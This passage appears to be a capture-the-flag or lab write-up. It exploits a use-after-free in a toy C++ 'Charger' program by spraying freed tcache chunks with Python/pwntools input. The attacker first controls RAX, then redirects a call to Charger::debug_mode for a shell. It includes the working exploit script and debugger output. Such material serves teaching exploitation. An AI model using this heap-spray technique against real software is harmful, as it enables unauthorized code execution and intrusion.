The ChargeGun::description is initialized in the add_gun function body:
void add_gun() {
...
ChargeGun* ngun;
...
if (dlen) {
ngun->description = new char[dlen+1];
printf("Enter description (manufacturer, ampacity, etc...): ");
fgets(ngun->description, dlen+1, stdin);
...
}
...
charger.guns.push_back(ngun);
}
Additionally, we know that each charge plug's destructor is invoked under two conditions: when the user explicitly removes it (option 2), or when the vector is destroyed in the Charger's own destructor (the bug). This gives us an opportunity to create a ChargeGun-sized buffer which is free'd after the user exits main; if we can fill a tcache chunk with user-controlled data, we can try to invoke the address of Charger::debug_mode and get a shell.
To control the value of RAX, we can play with loops of creating, and corresponding loops of destroying, the description buffer. From analyzing the toy code earlier, we know that the vector's internal size will equal 23+N-1 after one push operation.
We can perform fuzzing exercises by creating different amounts of buffers, free-ing the first one (index 0
), and allowing the UAF condition to take the spotlight.
In this case, three is the magic number, yielding a buffer of size 23+3-1 → 25 → 32. We can create a buffer somewhat smaller than 32 bytes to achieve our goal. For simplicity, we can start with a 24-byte payload, since it will neatly fit three eight-byte addresses and provide eight bytes of headroom:
create_iters = 3
payload_size = create_iters * 8       # 24 bytes
payload = "A" * payload_size
for _ in range(create_iters):
    p.sendline("1")                   # option 1: add a charge gun
    p.sendline("1")
    p.sendline(str(payload_size))
    p.sendline(payload)
p.sendline("2")                       # option 2: remove a charge gun...
p.sendline("0")                       # ...at index 0
p.sendline("6")                       # exit main, triggering the UAF
Our fuzz payload lands in RAX:
Segmentation Fault
...
wdb> x/i $pc
0x402074 <Charger::on_port_disconnected+142>: call rax
wdb> print $rax
$8 = 0x4141414141414141
Now, let's modify the payload to send the address of Charger::debug_mode:
wdb> print Charger::debug_mode
$9 = 0x402248
We can spray this address on each iteration of the loop:
create_iters = 3
payload_size = create_iters * 8
debug_addr = p64(0x402248)            # Charger::debug_mode
payload = b''.join([debug_addr for _ in range(create_iters)])
for _ in range(create_iters):
    p.sendline("1")
    p.sendline("1")
    p.sendline(str(payload_size))
    p.sendline(payload)
This gives us a shell.